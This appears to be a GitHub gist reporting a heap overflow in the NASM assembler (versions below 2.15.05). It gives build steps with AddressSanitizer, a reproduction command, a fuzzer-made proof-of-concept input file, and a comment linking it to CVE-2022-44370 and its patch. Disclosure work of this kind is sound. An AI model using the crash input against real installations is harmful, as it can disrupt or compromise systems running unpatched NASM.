Skip to content

Instantly share code, notes, and snippets.

@naihsin

naihsin/Nasm_vul_report.md Secret

Last active August 24, 2023 18:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save naihsin/b96e2c5c2c81621b46557fd7aacd165f to your computer and use it in GitHub Desktop.
Save naihsin/b96e2c5c2c81621b46557fd7aacd165f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Nasm_vul_report.md

Nasm heap overflow

Nasm version

  • <2.15.05

Compile Target

wget https://www.nasm.us/pub/nasm/releasebuilds/2.15.05/nasm-2.15.05.tar.gz
  • Decompress source code tar xvf nasm-2.15.05.tar.gz
  • Setup compiler flag and open sanitizer option
cd nasm-2.15.05
export CC=/usr/bin/gcc
export CXX=/usr/bin/g++
export CFLAGS="-g -fsanitize=address"
./configure --prefix=/usr/
  • Make install sudo make install
  • Check version ./nasm -v

image

How I found vulnerability

I used fuzzer crafted by myself, and then I found a crash.

I reproduce the vulnerability by this PoC.

./nasm -t -Z/dev/null -g -O0 -o /dev/null -M -f bin ./poc

The Address Sanitizer showed there is a heap overflow bug here. image

Raw
poc
;/07K0.bin
7rep 5
db 0
in
7rep 5
db 0
includ90790_i.am"
ludg?"Gnc2?a
le "incc2I.bin
7?ude "inc2.a
lude "inc2..bin
7repccepcccccctccccccNcccccccccccccc?ccacc
dccc??ccccccccccccccccccccccccccccc.bin
7repcccccctccccccccccccccccccccccaccccccc????cccccccccccc00000000000000000000cccHccccccccccccccccccc 5
db
0
%include "bde "inl2.a
lude %defineM?cd "br890790_iam"
lude "inc2m"
@szarkos
Copy link

szarkos commented Aug 24, 2023

This appears to be a duplicate of https://bugzilla.nasm.us/show_bug.cgi?id=3392815 (CVE-2022-44370)

I would suggest trying to repro with the latest dev branch, or test with the patch from the above bug report (netwide-assembler/nasm@2d4e695).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment